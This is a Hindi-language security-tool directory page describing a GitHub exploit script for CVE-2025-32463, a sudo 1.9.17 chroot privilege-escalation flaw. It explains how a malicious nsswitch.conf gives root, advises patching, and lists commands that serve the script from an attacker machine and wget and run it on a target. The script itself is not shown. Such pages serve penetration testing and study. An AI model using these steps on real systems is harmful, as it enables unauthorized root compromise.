Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32463 — # CVE-2025-32463 के लिए Bash शोषण स्क्रिप्ट Sudo 1.9.17 में chroot विकल्प के माध्यम से स्थानीय विशेषाधिकार वृद्धि (local privilege escalation) भेद्यता, जो प्रभावित सिस्टम पर रूट एक्सेस सक्षम करती है। | Kitploit
उपकरण/GitHubGitHub/justjoeyking/cve-2025-32463
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubjustjoeyking/cve-2025-32463

CVE-2025-32463

# CVE-2025-32463 के लिए Bash शोषण स्क्रिप्ट Sudo 1.9.17 में chroot विकल्प के माध्यम से स्थानीय विशेषाधिकार वृद्धि (local privilege escalation) भेद्यता, जो प्रभावित सिस्टम पर रूट एक्सेस सक्षम करती है।

रिपॉजिटरी देखें
310 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Sudo संस्करण 1.9.17 में एक गंभीर कमजोरी (CVE-2025-32463) है जो स्थानीय उपयोगकर्ताओं को chroot विकल्प का शोषण करके रूट एक्सेस प्राप्त करने की अनुमति देती है, जिससे गंभीर सुरक्षा जोखिम पैदा हो सकते हैं। उपयोगकर्ताओं को सलाह दी जाती है कि वे इस समस्या को कम करने के लिए संस्करण 1.9.17p1 या उसके बाद के संस्करण में अपडेट करें।

Sudo 1.9.17 कमजोरी का अवलोकन:-

Sudo संस्करण 1.9.17 में कमजोरी, जिसे CVE-2025-32463 के रूप में पहचाना गया है, एक गंभीर दोष है जो स्थानीय उपयोगकर्ताओं को रूट एक्सेस प्राप्त करने की अनुमति देता है। यह समस्या इस बदलाव के कारण उत्पन्न होती है कि Sudo --chroot (-R) विकल्प को कैसे संभालता है, जो प्रक्रियाओं की रूट डायरेक्टरी बदलकर उन्हें अलग करने के लिए अभिप्रेत है।

कमजोरी कैसे काम करती है:-

पथ समाधान समस्या: संस्करण 1.9.14 से 1.9.17 में, Sudo उपयोगकर्ता अनुमतियों की जाँच करने से पहले --chroot विकल्प का मूल्यांकन करता है। यह हमलावरों को पर्यावरण को नियंत्रित करने और दुर्भावनापूर्ण लाइब्रेरी लोड करने की अनुमति देता है।

शोषण के चरण:

एक हमलावर अपने नियंत्रण वाली डायरेक्टरी में एक दुर्भावनापूर्ण nsswitch.conf फ़ाइल बनाता है। वे -R विकल्प के साथ Sudo निष्पादित करते हैं, जिससे Sudo हमलावर का कॉन्फ़िगरेशन और लाइब्रेरी लोड करता है, और रूट एक्सेस प्रदान करता है।

मैंने "cwoot.sh" नामक एक bash स्क्रिप्ट बनाई है जो निष्पादन के बाद सीधे रूट उपयोगकर्ता में बदल जाएगी।

निम्नलिखित करें:

स्क्रिप्ट को रिपॉजिटरी से डाउनलोड करें: git clone https://github.com/justjoeyking/CVE-2025-32463.git

अपनी मशीन में : python3 -m http.server 8080

लक्ष्य मशीन में : wget http://<own_IP_address>:8080/cwoot.sh

लक्ष्य मशीन में : chmod 755 cwoot.sh

लक्ष्य मशीन में स्क्रिप्ट चलाएँ : ./cwoot.sh

टूल डाउनलोड करें